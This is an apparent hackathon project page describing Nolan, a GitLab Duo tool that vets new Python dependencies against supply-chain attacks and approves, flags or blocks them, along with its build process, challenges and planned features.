Nolan

Nolan is an autonomous trust firewall for GitLab Duo that evaluates new dependencies before install using origin, behavior, and fit, then approves, flags, or blocks them.

Comment

Inspiration

Recent supply-chain attacks showed that the real failure is not just missed malware detection. The real failure is that most teams still have no admission control layer between “dependency declared” and “dependency installed.” We built Nolan to stop that decision inside the SDLC, at review time, before a poisoned release can spread across developer machines and CI.

What it does

Nolan evaluates changed Python dependencies and issues one of three verdicts: APPROVE, INVESTIGATE, or BLOCK. It inspects provenance, release integrity, artifact behavior, and policy compliance; recommends a safe version; maps blast radius; and generates response artifacts such as a trust receipt, incident dossier, security issue, remediation MR, and HTML trust report.

How we built it

We built Nolan as a GitLab-native product with two surfaces: a public Duo flow and a companion investigator agent. Underneath that, we built a Python trust engine that resolves dependency deltas, expands transitive dependencies, queries PyPI metadata and integrity signals, unpacks wheel artifacts, analyzes Python ASTs for suspicious behavior, evaluates policy from AGENTS.md, and renders machine-readable artifacts that the Duo flow can consume.

Challenges we ran into

The hardest part was connecting deterministic security analysis with GitLab Duo in a way that stayed reliable enough for a demo. We had to bridge CI-produced evidence into the flow, handle environments where live CI was restricted, keep evidence-pack demos deterministic without making them fake, and make sure the same evidence model powered reports, GitLab actions, and conversational explanations.

Accomplishments that we're proud of

We’re proud that Nolan is not just a concept or a prompt chain. It performs real wheel inspection, real AST-based behavior analysis, real transitive dependency expansion, and real GitLab-oriented response packaging. We’re also proud that it feels like a product: selective verdicts, trust receipts for clean releases, incident artifacts for dangerous ones, and a polished demo/reporting layer.

What we learned

We learned that dependency trust is a governance problem as much as a detection problem. We also learned that the strongest architecture here is hybrid: deterministic systems should gather evidence and enforce hard rules, while the LLM should explain, summarize, and orchestrate actions instead of pretending to do raw forensics.

What's next for Nolan

Next, we want to publish the flow and agent fully in GitLab AI Catalog, complete the live MR artifact path everywhere, add npm support, improve organization-wide GitLab API exposure scanning, deepen provenance and attestation verification, and turn Nolan from a hackathon project into a production-grade trust layer for software teams.

Built With

  • github-releases-api
  • gitlab-ai-catalog
  • gitlab-ci/cd
  • gitlab-duo-agent-platform
  • gitlab-rest-api
  • html/css
  • markdown-artifacts
  • packaging
  • pypi-integrity-api
  • pypi-json-api
  • python-3.11
  • python-ast-analysis
  • urllib
  • yaml
  • zipfile
Share this project:

Updates